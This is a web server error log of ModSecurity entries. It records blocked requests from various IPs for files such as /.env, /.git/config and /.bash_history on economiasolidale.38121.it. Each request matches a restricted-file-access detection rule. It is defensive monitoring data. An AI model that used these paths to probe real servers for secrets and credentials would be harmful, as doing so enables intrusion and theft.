[Sun Jun 22 03:56:13.023825 2025] [:error] [pid 4017564] [client 13.238.200.234:37956] [client 13.238.200.234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aFdivR4Aj3aMHDvd0VREDgAAAAU"]
[Sun Jun 22 03:56:13.025681 2025] [:error] [pid 4017564] [client 13.238.200.234:37956] [client 13.238.200.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aFdivR4Aj3aMHDvd0VREDgAAAAU"]
[Sun Jun 22 03:56:13.025849 2025] [:error] [pid 4017564] [client 13.238.200.234:37956] [client 13.238.200.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aFdivR4Aj3aMHDvd0VREDgAAAAU"]
[Sun Jun 22 03:58:47.175867 2025] [:error] [pid 4017551] [client 13.238.200.234:41654] [client 13.238.200.234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFdjV8mM47YUMeieUQvmpgAAAAM"]
[Sun Jun 22 03:58:47.176120 2025] [:error] [pid 4017551] [client 13.238.200.234:41654] [client 13.238.200.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFdjV8mM47YUMeieUQvmpgAAAAM"]
[Sun Jun 22 03:58:47.176282 2025] [:error] [pid 4017551] [client 13.238.200.234:41654] [client 13.238.200.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFdjV8mM47YUMeieUQvmpgAAAAM"]
[Sun Jun 22 21:04:15.421042 2025] [:error] [pid 4020509] [client 146.70.117.92:26163] [client 146.70.117.92] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFhTr5Vm5qjnumggb7oagQAAAA4"]
[Sun Jun 22 21:04:15.421304 2025] [:error] [pid 4020509] [client 146.70.117.92:26163] [client 146.70.117.92] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFhTr5Vm5qjnumggb7oagQAAAA4"]
[Sun Jun 22 21:04:15.421488 2025] [:error] [pid 4020509] [client 146.70.117.92:26163] [client 146.70.117.92] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFhTr5Vm5qjnumggb7oagQAAAA4"]
[Sun Jun 22 23:44:19.864309 2025] [:error] [pid 4020488] [client 51.89.79.132:54706] [client 51.89.79.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFh5Mz1jPMIu0J5_ciAn4AAAAAo"]
[Sun Jun 22 23:44:19.864533 2025] [:error] [pid 4020488] [client 51.89.79.132:54706] [client 51.89.79.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFh5Mz1jPMIu0J5_ciAn4AAAAAo"]
[Sun Jun 22 23:44:19.864707 2025] [:error] [pid 4020488] [client 51.89.79.132:54706] [client 51.89.79.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFh5Mz1jPMIu0J5_ciAn4AAAAAo"]
[Wed Jun 25 13:24:26.391954 2025] [:error] [pid 563431] [client 198.55.98.210:52576] [client 198.55.98.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFvcatmSf_x6XcCzZHZpMwAAAAM"]
[Wed Jun 25 13:24:26.396657 2025] [:error] [pid 563431] [client 198.55.98.210:52576] [client 198.55.98.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFvcatmSf_x6XcCzZHZpMwAAAAM"]
[Wed Jun 25 13:24:26.396898 2025] [:error] [pid 563431] [client 198.55.98.210:52576] [client 198.55.98.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFvcatmSf_x6XcCzZHZpMwAAAAM"]
[Thu Jun 26 00:28:28.772057 2025] [:error] [pid 1092249] [client 185.146.232.218:11720] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aFx4DPLzjQ-NwdCBcCrfIQAAAAE"], referer: https://economiasolidale.38121.it/
[Thu Jun 26 00:28:28.772394 2025] [:error] [pid 1092249] [client 185.146.232.218:11720] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aFx4DPLzjQ-NwdCBcCrfIQAAAAE"], referer: https://economiasolidale.38121.it/
[Thu Jun 26 00:28:28.772569 2025] [:error] [pid 1092249] [client 185.146.232.218:11720] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aFx4DPLzjQ-NwdCBcCrfIQAAAAE"], referer: https://economiasolidale.38121.it/
[Thu Jun 26 00:28:43.928396 2025] [:error] [pid 1092252] [client 185.146.232.218:6516] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".bash_history" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .bash_history found within REQUEST_FILENAME: /.bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "aFx4G6jVMrflMeYSHuDGTgAAAAw"], referer: https://economiasolidale.38121.it/
[Thu Jun 26 00:28:43.928778 2025] [:error] [pid 1092252] [client 185.146.232.218:6516] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "aFx4G6jVMrflMeYSHuDGTgAAAAw"], referer: https://economiasolidale.38121.it/
[Thu Jun 26 00:28:43.928951 2025] [:error] [pid 1092252] [client 185.146.232.218:6516] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "aFx4G6jVMrflMeYSHuDGTgAAAAw"], referer: https://economiasolidale.38121.it/
[Sat Jun 28 21:16:33.206930 2025] [:error] [pid 2365674] [client 195.178.110.161:50304] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGA_kT02ZM75g_W8MNcM4gAAAAE"]
[Sat Jun 28 21:16:33.209588 2025] [:error] [pid 2365674] [client 195.178.110.161:50304] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGA_kT02ZM75g_W8MNcM4gAAAAE"]
[Sat Jun 28 21:16:33.209784 2025] [:error] [pid 2365674] [client 195.178.110.161:50304] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGA_kT02ZM75g_W8MNcM4gAAAAE"]
[Tue Jul 01 16:55:57.085700 2025] [:error] [pid 4183423] [client 195.178.110.161:55780] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGP2_VOjHnrlwCr9vzYVywAAAAU"]
[Tue Jul 01 16:55:57.088159 2025] [:error] [pid 4183423] [client 195.178.110.161:55780] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGP2_VOjHnrlwCr9vzYVywAAAAU"]
[Tue Jul 01 16:55:57.088363 2025] [:error] [pid 4183423] [client 195.178.110.161:55780] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGP2_VOjHnrlwCr9vzYVywAAAAU"]
[Wed Jul 02 15:18:21.894657 2025] [:error] [pid 818757] [client 195.178.110.161:40346] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGUxnYx8veS-APs6GM-egAAAABQ"]
[Wed Jul 02 15:18:21.897011 2025] [:error] [pid 818757] [client 195.178.110.161:40346] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGUxnYx8veS-APs6GM-egAAAABQ"]
[Wed Jul 02 15:18:21.897208 2025] [:error] [pid 818757] [client 195.178.110.161:40346] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGUxnYx8veS-APs6GM-egAAAABQ"]
[Sat Jul 05 03:30:12.261826 2025] [:error] [pid 945014] [client 34.162.148.146:49764] [client 34.162.148.146] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGiAJMq4zXHhTgDcWkZbIwAAAAA"]
[Sat Jul 05 03:30:12.262126 2025] [:error] [pid 945014] [client 34.162.148.146:49764] [client 34.162.148.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGiAJMq4zXHhTgDcWkZbIwAAAAA"]
[Sat Jul 05 03:30:12.262370 2025] [:error] [pid 945014] [client 34.162.148.146:49764] [client 34.162.148.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGiAJMq4zXHhTgDcWkZbIwAAAAA"]
[Sat Jul 05 03:30:12.372480 2025] [:error] [pid 945014] [client 34.162.148.146:49764] [client 34.162.148.146] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGiAJMq4zXHhTgDcWkZbJAAAAAA"]
[Sat Jul 05 03:30:12.372700 2025] [:error] [pid 945014] [client 34.162.148.146:49764] [client 34.162.148.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGiAJMq4zXHhTgDcWkZbJAAAAAA"]
[Sat Jul 05 03:30:12.372876 2025] [:error] [pid 945014] [client 34.162.148.146:49764] [client 34.162.148.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGiAJMq4zXHhTgDcWkZbJAAAAAA"]
[Sat Jul 05 06:03:04.494315 2025] [:error] [pid 945018] [client 34.162.141.202:42072] [client 34.162.141.202] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGij-M-EaHfkH-3DQY4hkQAAAAQ"]
[Sat Jul 05 06:03:04.494613 2025] [:error] [pid 945018] [client 34.162.141.202:42072] [client 34.162.141.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGij-M-EaHfkH-3DQY4hkQAAAAQ"]
[Sat Jul 05 06:03:04.494785 2025] [:error] [pid 945018] [client 34.162.141.202:42072] [client 34.162.141.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGij-M-EaHfkH-3DQY4hkQAAAAQ"]
[Sat Jul 05 06:03:04.605083 2025] [:error] [pid 945018] [client 34.162.141.202:42072] [client 34.162.141.202] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGij-M-EaHfkH-3DQY4hkgAAAAQ"]
